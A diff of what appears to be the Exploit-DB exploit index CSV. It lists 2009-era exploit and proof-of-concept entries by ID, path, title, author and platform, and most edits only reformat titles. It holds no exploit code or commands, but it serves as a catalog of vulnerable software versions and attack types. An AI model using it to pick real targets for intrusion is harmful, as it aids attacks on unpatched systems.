+9516,platforms/windows/dos/9516.txt,"Novell Client for Windows 2000/XP - ActiveX Remote DoS",2009-08-25,"Francis Provencher",windows,dos,0 9517,platforms/windows/dos/9517.txt,"Lotus note connector for Blackberry Manager 5.0.0.11 - ActiveX DoS",2009-08-25,"Francis Provencher",windows,dos,0 9518,platforms/php/webapps/9518.txt,"EMO Breader Manager - (video.php movie) SQL Injection",2009-08-25,Mr.SQL,php,webapps,0 9519,platforms/windows/local/9519.pl,"ProShow Producer / Gold 4.0.2549 - (.psh) Universal BoF Exploit (SEH)",2009-08-25,hack4love,windows,local,0 @@ -9018,7 +9018,7 @@ id,file,description,date,author,platform,type,port 9553,platforms/php/webapps/9553.txt,"BandCMS 0.10 news.php Multiple SQL Injection",2009-08-31,Affix,php,webapps,0 9554,platforms/windows/dos/9554.html,"Apple iPhone 2.2.1/3.x - (MobileSafari) Crash & Reboot Exploit",2009-08-31,TheLeader,windows,dos,0 9555,platforms/php/webapps/9555.txt,"Mybuxscript PTC-BUX - (spnews.php) SQL Injection",2009-08-31,HxH,php,webapps,0 -9556,platforms/php/webapps/9556.php,"osCommerce Online Merchant 2.2 RC2a Code Execution Exploit",2009-08-31,flyh4t,php,webapps,0 +9556,platforms/php/webapps/9556.php,"osCommerce Online Merchant 2.2 RC2a - Code Execution Exploit",2009-08-31,flyh4t,php,webapps,0 9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 - FTP Server Remote Stack Overflow Exploit (Windows 2000 SP4)",2009-09-01,muts,windows,remote,21 9560,platforms/windows/local/9560.txt,"Soritong MP3 Player 1.0 - (.m3u/UI.txt) Universal Local BoF Exploits",2009-09-01,hack4love,windows,local,0 9561,platforms/windows/dos/9561.py,"AIMP2 Audio Converter 2.53b330 - (.pls/.m3u) Unicode Crash PoC",2009-09-01,mr_me,windows,dos,0 @@ -9044,8 +9044,8 @@ id,file,description,date,author,platform,type,port 9581,platforms/windows/local/9581.pl,"SAP Player 0.9 - (.m3u) Universal Local BoF Exploit (SEH)",2009-09-03,PLATEN,windows,local,0 9582,platforms/php/webapps/9582.txt,"FreeSchool 1.1.0 - Multiple Remote File Inclusion",2009-09-03,"cr4wl3r ",php,webapps,0 9583,platforms/php/webapps/9583.txt,"PHPope 1.0.0 - Multiple Remote File Inclusion",2009-09-03,"cr4wl3r ",php,webapps,0 -9584,platforms/windows/dos/9584.txt,"PPstream 2.6.86.8900 PPSMediaList ActiveX Remote BoF PoC (1)",2009-09-03,"expose 0day",windows,dos,0 -9585,platforms/windows/dos/9585.txt,"PPstream 2.6.86.8900 PPSMediaList ActiveX Remote BoF PoC (2)",2009-09-03,"expose 0day",windows,dos,0 +9584,platforms/windows/dos/9584.txt,"PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote BoF PoC (1)",2009-09-03,"expose 0day",windows,dos,0 +9585,platforms/windows/dos/9585.txt,"PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote BoF PoC (2)",2009-09-03,"expose 0day",windows,dos,0 9586,platforms/windows/remote/9586.py,"SIDVault 2.0e Windows Remote Buffer Overflow Exploit",2009-09-03,blake,windows,remote,389 9587,platforms/windows/dos/9587.txt,"Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service",2009-09-04,kingcope,windows,dos,0 9588,platforms/php/webapps/9588.txt,"Mambo Component com_zoom (catid) Blind SQL Injection",2009-09-04,boom3rang,php,webapps,0 @@ -9091,7 +9091,7 @@ id,file,description,date,author,platform,type,port 9630,platforms/php/webapps/9630.txt,"MYRE Holiday Rental Manager (action) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 9631,platforms/php/webapps/9631.txt,"iDesk - (download.php cat_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 9632,platforms/php/webapps/9632.txt,"Accommodation Hotel Booking Portal - (hotel_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 -9633,platforms/php/webapps/9633.txt,"Bus Script (sitetext_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 +9633,platforms/php/webapps/9633.txt,"Bus Script - (sitetext_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 9634,platforms/php/webapps/9634.txt,"Adult Portal escort listing - (user_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 9635,platforms/php/webapps/9635.txt,"Drunken:Golem Gaming Portal - (admin_news_bot.php) Remote File Inclusion",2009-09-10,"EA Ngel",php,webapps,0 9636,platforms/php/webapps/9636.txt,"An image gallery 1.0 - (navigation.php) Local Directory Traversal",2009-09-10,"ThE g0bL!N",php,webapps,0 @@ -9117,7 +9117,7 @@ id,file,description,date,author,platform,type,port 9656,platforms/php/webapps/9656.txt,"Aurora CMS 1.0.2 - (install.plugin.php) Remote File Inclusion",2009-09-14,"EA Ngel",php,webapps,0 9657,platforms/windows/dos/9657.pl,"httpdx Web Server 1.4 - (Host Header) Remote Format String Denial of Service",2009-09-14,"Pankaj Kohli",windows,dos,0 9658,platforms/hardware/remote/9658.txt,"Neufbox NB4-R1.5.10-MAIN Persistent XSS",2009-09-14,"599eme Man",hardware,remote,0 -9659,platforms/windows/local/9659.cpp,"Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow PoC",2009-09-14,"fl0 fl0w",windows,local,0 +9659,platforms/windows/local/9659.cpp,"Portable E.M Magic Morph 1.95b - .MOR File Stack Buffer Overflow PoC",2009-09-14,"fl0 fl0w",windows,local,0 9660,platforms/windows/remote/9660.pl,"Techlogica HTTP Server 1.03 - Arbitrary File Disclosure Exploit",2009-09-14,"ThE g0bL!N",windows,remote,0 9661,platforms/windows/local/9661.c,"MP3 Studio 1.0 - (.m3u) Local Buffer Overflow Exploit",2009-09-14,dmc,windows,local,0 9662,platforms/windows/remote/9662.c,"IPSwitch IMAP Server 9.20 - Remote Buffer Overflow Exploit",2009-09-14,dmc,windows,remote,143 @@ -9160,7 +9160,7 @@ id,file,description,date,author,platform,type,port 9701,platforms/windows/dos/9701.c,"Notepad++ 5.4.5 - Local .C/CPP Stack Buffer Overflow PoC (0Day)",2009-09-16,"fl0 fl0w",windows,dos,0 9702,platforms/php/webapps/9702.txt,"Elite Gaming Ladders 3.2 - (platform) SQL Injection",2009-09-16,snakespc,php,webapps,0 9703,platforms/php/webapps/9703.txt,"phpPollScript 1.3 - (include_class) Remote File Inclusion",2009-09-16,"cr4wl3r ",php,webapps,0 -9704,platforms/windows/remote/9704.html,"Quiksoft EasyMail 6.0.3.0 imap connect() ActiveX BoF Exploit",2009-09-17,"Sebastian Wolfgarten",windows,remote,0 +9704,platforms/windows/remote/9704.html,"Quiksoft EasyMail 6.0.3.0 - imap connect() ActiveX BoF Exploit",2009-09-17,"Sebastian Wolfgarten",windows,remote,0 9705,platforms/windows/remote/9705.html,"Quiksoft EasyMail 6 - (AddAttachment) Remote Buffer Overflow Exploit",2009-09-17,bmgsec,windows,remote,0 9706,platforms/php/webapps/9706.txt,"joomla component com_album 1.14 - Directory Traversal",2009-09-17,DreamTurk,php,webapps,0 9707,platforms/windows/dos/9707.pl,"Ease Audio Cutter 1.20 - (.wav) Local Crash PoC",2009-09-17,zAx,windows,dos,0 @@ -9239,7 +9239,7 @@ id,file,description,date,author,platform,type,port 9850,platforms/php/webapps/9850.txt,"Xerox Fiery Webtools SQL Injection",2009-11-03,"Bernardo Trigo",php,webapps,0 9851,platforms/windows/remote/9851.pl,"Xion Audio Player 1.0 121 - (.m3u) Buffer Overflow",2009-11-03,corelanc0d3r,windows,remote,0 9852,platforms/windows/dos/9852.py,"Home FTP Server 1.10.1.139 - 'SITE INDEX' Command Remote Denial of Service",2009-11-16,zhangmc,windows,dos,21 -9853,platforms/windows/remote/9853.rb,"Symantec ConsoleUtilities ActiveX Buffer Overflow (Metasploit)",2009-11-02,"Nikolas Sotiriu",windows,remote,0 +9853,platforms/windows/remote/9853.rb,"Symantec ConsoleUtilities - ActiveX Buffer Overflow (Metasploit)",2009-11-02,"Nikolas Sotiriu",windows,remote,0 9854,platforms/php/webapps/9854.txt,"tftgallery .13 - Directory Traversal Exploit",2009-11-02,blake,php,webapps,0 9855,platforms/php/webapps/9855.txt,"Geeklog 1.6.0sr2 - Remote File Upload",2009-10-03,JaL0h,php,webapps,0 9856,platforms/asp/webapps/9856.txt,"Snitz Forums 2000 - Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,"Andrea Fabrizi",asp,webapps,0 @@ -9252,7 +9252,7 @@ id,file,description,date,author,platform,type,port 9863,platforms/php/webapps/9863.txt,"Achievo 1.3.4 - XSS",2009-10-14,"Ryan Dewhurst",php,webapps,0 9865,platforms/windows/local/9865.py,"Adobe Acrobat Reader 7-9 - U3D BoF",2009-10-27,"Felipe Andres Manzano",windows,local,0 9866,platforms/windows/local/9866.txt,"Alleycode HTML Editor 2.2.1 - BoF",2009-10-29,Dr_IDE,windows,local,0 -9867,platforms/php/webapps/9867.txt,"Amiro.CMS 5.4.0.0 folder disclosure",2009-10-19,"Vladimir Vorontsov",php,webapps,0 +9867,platforms/php/webapps/9867.txt,"Amiro.CMS 5.4.0.0 - folder disclosure",2009-10-19,"Vladimir Vorontsov",php,webapps,0 9871,platforms/windows/dos/9871.txt,"Boloto Media Player 1.0.0.9 - pls file DoS",2009-10-27,Dr_IDE,windows,dos,0 9872,platforms/multiple/webapps/9872.txt,"boxalino 09.05.25-0421 - Directory Traversal",2009-10-20,"Axel Neumann",multiple,webapps,0 9873,platforms/windows/webapps/9873.txt,"Cherokee 0.5.4 - Directory Traversal",2009-10-28,Dr_IDE,windows,webapps,0 @@ -9264,8 +9264,8 @@ id,file,description,date,author,platform,type,port 9880,platforms/php/webapps/9880.txt,"Endonesia CMS 8.4 - Local File Inclusion",2009-11-04,s4r4d0,php,webapps,0 9881,platforms/windows/dos/9881.txt,"Eureka Mail Client 2.2q PoC BoF",2009-10-23,"Francis Provencher",windows,dos,110 9882,platforms/windows/local/9882.txt,"Firefox 3.5.3 - Local Download Manager Temp File Creation",2009-10-28,"Jeremy Brown",windows,local,0 -9884,platforms/windows/local/9884.txt,"GPG2/Kleopatra 2.0.11 malformed certificate PoC",2009-10-21,Dr_IDE,windows,local,0 -9885,platforms/windows/webapps/9885.txt,"httpdx 1.4.6b source disclosure",2009-10-21,Dr_IDE,windows,webapps,0 +9884,platforms/windows/local/9884.txt,"GPG2/Kleopatra 2.0.11 - Malformed certificate PoC",2009-10-21,Dr_IDE,windows,local,0 +9885,platforms/windows/webapps/9885.txt,"httpdx 1.4.6b - source disclosure",2009-10-21,Dr_IDE,windows,webapps,0 9886,platforms/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer BoF (Metasploit)",2009-10-16,"Pankaj Kohli, Trancer",windows,remote,0 9887,platforms/jsp/webapps/9887.txt,"jetty 6.x < 7.x - XSS / Information Disclosure / Injection",2009-10-26,"Antonion Parata",jsp,webapps,0 9888,platforms/php/webapps/9888.txt,"Joomla Ajax Chat 1.0 - Remote File Inclusion",2009-10-19,kaMtiEz,php,webapps,0 @@ -9363,10 +9363,10 @@ id,file,description,date,author,platform,type,port 9988,platforms/windows/local/9988.txt,"Adobe Photoshop Elements - Active File Monitor Service Local Privilege Escalation",2009-10-29,"bellick ",windows,local,0 9990,platforms/multiple/local/9990.txt,"Adobe Reader and Acrobat - .U3D File Invalid Array Index Remote",2009-11-09,"Felipe Andres Manzano",multiple,local,0 9991,platforms/windows/local/9991.txt,"AlleyCode 2.21 - SEH Overflow PoC",2009-10-05,"Rafael Sousa",windows,local,0 -9992,platforms/windows/remote/9992.txt,"AOL 9.1 SuperBuddy ActiveX Control Remote code execution",2009-10-01,Trotzkista,windows,remote,0 +9992,platforms/windows/remote/9992.txt,"AOL 9.1 SuperBuddy - ActiveX Control Remote code execution",2009-10-01,Trotzkista,windows,remote,0 9993,platforms/multiple/remote/9993.txt,"Apache mod_perl 'Apache::Status' and 'Apache2::Status' - Cross-Site Scripting",2009-11-09,"Richard H. Brain",multiple,remote,0 -9994,platforms/multiple/remote/9994.txt,"Apache Tomcat Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",multiple,remote,0 -9995,platforms/multiple/remote/9995.txt,"Apache Tomcat Form Authentication Username Enumeration Weakness",2009-11-09,"D. Matscheko",multiple,remote,0 +9994,platforms/multiple/remote/9994.txt,"Apache Tomcat - Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",multiple,remote,0 +9995,platforms/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication Username Enumeration Weakness",2009-11-09,"D. Matscheko",multiple,remote,0 9996,platforms/php/webapps/9996.txt,"Article Directory Index.php Remote File Inclusion",2009-11-12,mozi,php,webapps,0 9997,platforms/multiple/remote/9997.txt,"Blender 2.49b - (.blend) Remote Command Execution",2009-11-09,"Fernando Russ",multiple,remote,0 9998,platforms/windows/remote/9998.c,"BulletProof FTP 2.63 b56 - Client Malformed '.bps' File Stack Buffer Overflow",2009-10-07,"Rafa De Sousa",windows,remote,21 @@ -9510,9 +9510,9 @@ id,file,description,date,author,platform,type,port 10208,platforms/windows/dos/10208.txt,"Firefox + Adobe - Memory Corruption PoC",2009-10-14,Skylined,windows,dos,0 10209,platforms/multiple/webapps/10209.txt,"Everfocus 1.4 - EDSR Remote Authentication Bypass",2009-10-14,"Andrea Fabrizi",multiple,webapps,0 10210,platforms/windows/dos/10210.txt,"Microsoft Internet Explorer 6/7 - CSS Handling Denial of Service",2009-11-20,K4mr4n_st,windows,dos,0 -10211,platforms/windows/local/10211.txt,"Autodesk SoftImage Scene TOC Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 -10212,platforms/windows/local/10212.txt,"Autodesk 3DS Max Application Callbacks Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 -10213,platforms/windows/local/10213.txt,"Autodesk Maya Script Nodes Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 +10211,platforms/windows/local/10211.txt,"Autodesk SoftImage Scene TOC - Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 +10212,platforms/windows/local/10212.txt,"Autodesk 3DS - Max Application Callbacks Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 +10213,platforms/windows/local/10213.txt,"Autodesk Maya Script - Nodes Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 10214,platforms/php/webapps/10214.txt,"Joomla Component mygallery - (farbinform_krell) SQL Injection",2009-11-23,"Manas58 BAYBORA",php,webapps,0 10216,platforms/php/webapps/10216.txt,"kr-web 1.1b2 - Remote File Inclusion",2009-11-24,"cr4wl3r ",php,webapps,0 10217,platforms/php/webapps/10217.txt,"NukeHall 0.3 - Multiple Remote File Inclusion",2009-11-24,"cr4wl3r ",php,webapps,0 @@ -9520,7 +9520,7 @@ id,file,description,date,author,platform,type,port 10219,platforms/php/webapps/10219.txt,"phptraverse 0.8.0 - Remote File Inclusion",2009-11-24,"cr4wl3r ",php,webapps,0 10220,platforms/php/webapps/10220.txt,"pointcomma 3.8b2 - Remote File Inclusion",2009-11-24,"cr4wl3r ",php,webapps,0 10221,platforms/windows/dos/10221.txt,"XM Easy Personal FTP Server 5.8.0 - Remote DoS",2009-11-24,leinakesi,windows,dos,21 -10222,platforms/php/webapps/10222.txt,"W3infotech (Auth Bypass) SQL Injection",2009-11-24,ViRuS_HiMa,php,webapps,0 +10222,platforms/php/webapps/10222.txt,"W3infotech - (Auth Bypass) SQL Injection",2009-11-24,ViRuS_HiMa,php,webapps,0 10223,platforms/windows/dos/10223.txt,"TYPSoft 1.10 - APPE DELE DoS",2009-11-24,leinakesi,windows,dos,21 10224,platforms/php/webapps/10224.txt,"Quick.Cart 3.4 and Quick.CMS 2.4 - CSRF",2009-11-24,"Alice Kaerast",php,webapps,0 10225,platforms/windows/webapps/10225.txt,"MDaemon WebAdmin 2.0.x - SQL injection",2006-05-26,KOUSULIN,windows,webapps,1000 @@ -9586,7 +9586,7 @@ id,file,description,date,author,platform,type,port 10292,platforms/multiple/webapps/10292.txt,"Apache Tomcat 3.2.1 - 404 Error Page Cross-Site Scripting",2009-12-01,MustLive,multiple,webapps,0 10293,platforms/php/webapps/10293.txt,"PHP-Nuke 8.0 - XSS / HTML Code Injection in News Module",2009-11-27,K053,php,webapps,0 10294,platforms/php/webapps/10294.txt,"OSI Codes PHP Live! Support 3.1 - Remote File Inclusion",2009-11-24,"Don Tukulesto",php,webapps,0 -10295,platforms/windows/local/10295.txt,"DAZ Studio Arbitrary Command Execution",2009-12-03,"Core Security",windows,local,0 +10295,platforms/windows/local/10295.txt,"DAZ Studio - Arbitrary Command Execution",2009-12-03,"Core Security",windows,local,0 10296,platforms/php/local/10296.txt,"PHP 'ini_restore()' Memory Information Disclosure",2009-12-03,"Maksymilian Arciemowicz",php,local,0 10297,platforms/php/webapps/10297.php,"Vivid Ads Shopping Cart (prodid) SQL Injection",2009-12-03,"Yakir Wizman",php,webapps,0 10298,platforms/windows/local/10298.c,"Jasc Paint Shop Pro 8 - Local Buffer Overflow Exploit (Universal)",2009-12-04,"fl0 fl0w",windows,local,0 @@ -9651,7 +9651,7 @@ id,file,description,date,author,platform,type,port 10372,platforms/aix/webapps/10372.txt,"OPMANAGER - Blind SQL/XPath injectio",2009-12-10,"Asheesh kumar Mani Tripathi",aix,webapps,0 10373,platforms/windows/local/10373.rb,"Xenorate 2.50 - (.xpl) universal Local Buffer Overflow Exploit (SEH) (Metasploit)",2009-12-10,"loneferret germaya_x",windows,local,0 10374,platforms/windows/local/10374.pl,"Easy RM to MP3 Converter 2.7.3.700",2009-12-10,"Vinod Sharma",windows,local,0 -10375,platforms/windows/remote/10375.html,"SAP GUI for Windows sapirrfc.dll ActiveX Overflow Exploit",2009-12-10,Abysssec,windows,remote,0 +10375,platforms/windows/remote/10375.html,"SAP GUI for Windows - sapirrfc.dll ActiveX Overflow Exploit",2009-12-10,Abysssec,windows,remote,0 10376,platforms/windows/webapps/10376.txt,"Billwerx RC 3.1 - Multiple Vulnerabilities",2009-12-11,mr_me,windows,webapps,80 10377,platforms/windows/dos/10377.txt,"IBM SolidDB - Invalid Error Code",2009-11-18,"Core Security",windows,dos,2315 10378,platforms/php/webapps/10378.txt,"Nuggetz CMS 1.0 - Remote Code Execution",2009-12-10,"Amol Naik",php,webapps,0 @@ -9738,14 +9738,14 @@ id,file,description,date,author,platform,type,port 10480,platforms/php/webapps/10480.txt,"OSSIM 2.1.5 - Remote Command Execution",2009-12-16,"Nahuel Grisolia",php,webapps,0 10481,platforms/php/webapps/10481.txt,"OSSIM 2.1.5 - Arbitrary File Upload",2009-12-16,"Nahuel Grisolia",php,webapps,0 10482,platforms/asp/webapps/10482.txt,"Codefixer Membership Remote Database Disclosure",2009-12-16,"ViRuSMaN ",asp,webapps,0 -10483,platforms/asp/webapps/10483.txt,"GuestBookPro Script Remote Database Disclosure",2009-12-16,"ViRuSMaN ",asp,webapps,0 +10483,platforms/asp/webapps/10483.txt,"GuestBookPro Script - Remote Database Disclosure",2009-12-16,"ViRuSMaN ",asp,webapps,0 10484,platforms/windows/local/10484.txt,"Kaspersky Lab - Multiple Products Local Privilege Escalation",2009-12-16,"Maxim A. Kulakov",windows,local,0 10485,platforms/php/webapps/10485.txt,"Drupal Sections Module - XSS",2009-12-16,"Justin C. Klein Keane",php,webapps,0 14034,platforms/windows/dos/14034.pl,"Wincalc 2 - (.num) Local Buffer Overflow PoC",2010-06-24,Madjix,windows,dos,0 10487,platforms/linux/local/10487.txt,"VideoCache 1.9.2 vccleaner Root",2009-12-16,"Dominick LaTrappe",linux,local,0 10488,platforms/php/webapps/10488.txt,"WP-Forum 2.3 - SQL Injection / Blind SQL Injection",2009-12-16,"Juan Galiana Lara",php,webapps,0 10489,platforms/windows/dos/10489.txt,"Google Picasa 3.5 - Local DoS Buffer Overflow",2009-12-16,Connection,windows,dos,0 -10492,platforms/php/webapps/10492.txt,"Pre Hospital Management System (auth bypass) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 +10492,platforms/php/webapps/10492.txt,"Pre Hospital Management System - (Auth bypass) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 10493,platforms/php/webapps/10493.txt,"WHMCompleteSolution CMS - SQL Injection",2009-12-16,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10494,platforms/php/webapps/10494.txt,"D-Tendencia Bt 2008 - SQL Injection",2009-12-16,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10495,platforms/php/webapps/10495.txt,"PhpLinkExchange 1.02 - XSS/Upload Vulerability",2009-12-16,Stink',php,webapps,0 @@ -9753,8 +9753,8 @@ id,file,description,date,author,platform,type,port 10497,platforms/php/webapps/10497.txt,"File Share 1.0 - SQL Injection",2009-12-16,"TOP SAT 13",php,webapps,0 10498,platforms/php/webapps/10498.txt,"Pre Hospital Management System - (department.php id) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 10499,platforms/php/webapps/10499.txt,"eUploader PRO 3.1.1 - (CSRF/XSS) Multiple Vulnerabilities",2009-12-16,"Milos Zivanovic ",php,webapps,0 -10500,platforms/php/webapps/10500.txt,"Omnistar Affiliate (Auth Bypass) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 -10501,platforms/asp/webapps/10501.txt,"Texas Rankem(player.asp player_id) SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 +10500,platforms/php/webapps/10500.txt,"Omnistar Affiliate - (Auth Bypass) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 +10501,platforms/asp/webapps/10501.txt,"Texas Rankem - (player.asp player_id) SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10502,platforms/asp/webapps/10502.txt,"PRE HOTELS&RESORTS MANAGEMENT SYSTEM(Auth Bypass) SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10503,platforms/asp/webapps/10503.txt,"ASPGuest - (edit.asp ID) Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10504,platforms/asp/webapps/10504.txt,"Smart ASPad(campaignEdit.asp CCam) Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 @@ -9767,12 +9767,12 @@ id,file,description,date,author,platform,type,port 10514,platforms/windows/webapps/10514.txt,"dblog - (dblog.mdb) Remote Database Disclosure",2009-12-17,"AnTi SeCuRe",windows,webapps,0 10515,platforms/php/webapps/10515.txt,"Basic PHP Events Lister 2 Add Admin Exploit",2009-12-17,RENO,php,webapps,0 10516,platforms/php/webapps/10516.txt,"Jobscript4Web 3.5 - Multiple CSRF",2009-12-17,bi0,php,webapps,0 -10517,platforms/php/webapps/10517.txt,"Matrimony Script CSRF",2009-12-17,bi0,php,webapps,0 +10517,platforms/php/webapps/10517.txt,"Matrimony Script - CSRF",2009-12-17,bi0,php,webapps,0 10520,platforms/asp/webapps/10520.txt,"Active Auction House 3.6 - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10521,platforms/asp/webapps/10521.txt,"Active Photo Gallery 6.2 - (Auth Bypass) SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10522,platforms/php/webapps/10522.txt,"Pre Job Board 1.0 - SQL Bypass",2009-12-17,bi0,php,webapps,0 10523,platforms/php/webapps/10523.txt,"Uploader by CeleronDude 5.3.0 - Shell Upload",2009-12-17,Stink,php,webapps,0 -10525,platforms/asp/webapps/10525.txt,"Pre Jobo .NET SQL Bypass",2009-12-17,bi0,asp,webapps,0 +10525,platforms/asp/webapps/10525.txt,"Pre Jobo .NET - SQL Bypass",2009-12-17,bi0,asp,webapps,0 10526,platforms/asp/webapps/10526.txt,"ActiveBuyandSell 6.2 - (buyersend.asp catid) Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10527,platforms/php/webapps/10527.txt,"ReVou Software SQL Injection",2009-12-17,R3d-D3V!L,php,webapps,0 10528,platforms/php/webapps/10528.txt,"V.H.S. Booking - (hotel_habitaciones.php HotelID) SQL Injection",2009-12-17,R3d-D3V!L,php,webapps,0 @@ -9808,7 +9808,7 @@ id,file,description,date,author,platform,type,port 10567,platforms/php/webapps/10567.txt,"Advance Biz Limited 1.0 - (Auth Bypass) SQL Injection",2009-12-20,PaL-D3v1L,php,webapps,0 10568,platforms/php/webapps/10568.txt,"Simplicity oF Upload 1.3.2 - Remote File Upload",2009-12-20,"Master Mind",php,webapps,0 10569,platforms/php/webapps/10569.txt,"Ignition 1.2 - Multiple Local File Inclusion",2009-12-20,cOndemned,php,webapps,0 -10570,platforms/php/webapps/10570.txt,"Pandora Fms Monitoring Z0D",2009-12-20,Global-Evolution,php,webapps,0 +10570,platforms/php/webapps/10570.txt,"Pandora FMS Monitoring Application 2.1.x / 3.x - SQL Injection Exploit",2009-12-20,Global-Evolution,php,webapps,0 10571,platforms/php/webapps/10571.txt,"PacketFence Network Access Controller XSS",2009-12-20,K053,php,webapps,0 10572,platforms/php/webapps/10572.txt,"4Images 1.7.1 - SQL Injection",2009-12-20,"Master Mind",php,webapps,0 10573,platforms/asp/webapps/10573.txt,"8pixel.net 2009. - Database Disclosure",2009-12-20,LionTurk,asp,webapps,0 @@ -9845,7 +9845,7 @@ id,file,description,date,author,platform,type,port 10609,platforms/php/webapps/10609.txt,"Aurora CMS - SQL Injection Exploit",2009-12-22,Sora,php,webapps,0 10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 - (CGI) Arbitrary Command Execution",2009-12-23,"Aaron Conole",linux,remote,0 10611,platforms/php/webapps/10611.txt,"35mm Slide Gallery - Cross-Site Scripting",2009-12-23,indoushka,php,webapps,0 -10612,platforms/php/webapps/10612.txt,"Add An Ad Script Remote File Upload",2009-12-23,MR.Z,php,webapps,0 +10612,platforms/php/webapps/10612.txt,"Add An Ad Script - Remote File Upload",2009-12-23,MR.Z,php,webapps,0 10613,platforms/linux/local/10613.c,"Linux Kernel 2.6.18-20 2009 - Local Root Exploit",2009-12-23,DigitALL,linux,local,0 10614,platforms/php/webapps/10614.txt,"35mm Slide Gallery - Directory Traversal",2009-12-23,Mr.tro0oqy,php,webapps,0 10615,platforms/php/webapps/10615.txt,"PHP-Nuke Module Emporium 2.3.0 - (id_catg) SQL Injection",2009-12-23,"Hussin X",php,webapps,0 @@ -9879,10 +9879,10 @@ id,file,description,date,author,platform,type,port 10653,platforms/php/webapps/10653.txt,"Winn Guestbook 2.4 / Winn.ws - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 10654,platforms/php/webapps/10654.txt,"APHP ImgList 1.2.2 - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 10655,platforms/php/webapps/10655.txt,"Best Top List Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 -10656,platforms/php/webapps/10656.txt,"B2B Trading Marketplace SQL Injection",2009-12-25,"AnGrY BoY",php,webapps,0 +10656,platforms/php/webapps/10656.txt,"B2B Trading Marketplace - SQL Injection",2009-12-25,"AnGrY BoY",php,webapps,0 10658,platforms/php/webapps/10658.txt,"caricatier 2.5 - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 10660,platforms/php/webapps/10660.txt,"barbo91 - uploads Upload Shell",2009-12-25,indoushka,php,webapps,0 -10661,platforms/php/webapps/10661.txt,"Ads Electronic Al-System Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 +10661,platforms/php/webapps/10661.txt,"Ads Electronic Al-System - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 10664,platforms/windows/local/10664.py,"ReGet Deluxe 5.2 - (build 330) Stack Overflow Exploit",2009-12-25,"Encrypt3d.M!nd ",windows,local,0 10665,platforms/php/webapps/10665.txt,"Jevonweb Guestbook Remote Admin Access Exploit",2009-12-25,Sora,php,webapps,0 10666,platforms/php/webapps/10666.txt,"Simple PHP Guestbook Remote Admin Access Exploit",2009-12-25,Sora,php,webapps,0 @@ -9967,7 +9967,7 @@ id,file,description,date,author,platform,type,port 10752,platforms/multiple/webapps/10752.txt,"Yonja Remote File Upload",2009-12-28,indoushka,multiple,webapps,80 10753,platforms/multiple/webapps/10753.txt,"ASP Simple Blog 3.0 - Upload shell",2009-12-28,indoushka,multiple,webapps,80 10754,platforms/multiple/webapps/10754.txt,"Joomla Component com_if_nexus - Remote File Inclusion",2009-12-28,FL0RiX,multiple,webapps,80 -10755,platforms/linux/webapps/10755.txt,"egegen turkish script SQL Injection",2009-12-28,FormatXformat,linux,webapps,80 +10755,platforms/linux/webapps/10755.txt,"egegen turkish script - SQL Injection",2009-12-28,FormatXformat,linux,webapps,80 10756,platforms/linux/webapps/10756.txt,"MySimpleFileUploader 1.6 - Upload Shell",2009-12-28,FormatXformat,linux,webapps,80 10757,platforms/linux/webapps/10757.txt,"PHP Forum ohne My SQL Remote File Upload",2009-12-28,"wlhaan hacker",linux,webapps,80 10758,platforms/php/webapps/10758.txt,"Calendar Express 2.0 - SQL Injection",2009-12-28,BAYBORA,php,webapps,0 @@ -9976,7 +9976,7 @@ id,file,description,date,author,platform,type,port 10762,platforms/php/webapps/10762.txt,"Sunbyte e-Flower - SQL Injection",2009-12-28,"Don Tukulesto",php,webapps,0 10763,platforms/php/webapps/10763.txt,"Dren's PHP Uploader - Remote File Upload",2009-12-28,"Cyb3r IntRue",php,webapps,0 10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - SEH (0Day)",2009-12-29,Lincoln,windows,remote,6660 -10767,platforms/asp/webapps/10767.txt,"jgbbs-3.0beta1 DB Download",2009-12-29,indoushka,asp,webapps,0 +10767,platforms/asp/webapps/10767.txt,"jgbbs-3.0beta1 - DB Download",2009-12-29,indoushka,asp,webapps,0 10770,platforms/asp/webapps/10770.txt,"PSnews DB Download",2009-12-29,indoushka,asp,webapps,0 10771,platforms/asp/webapps/10771.txt,"QuickEStore 7.9 - SQL 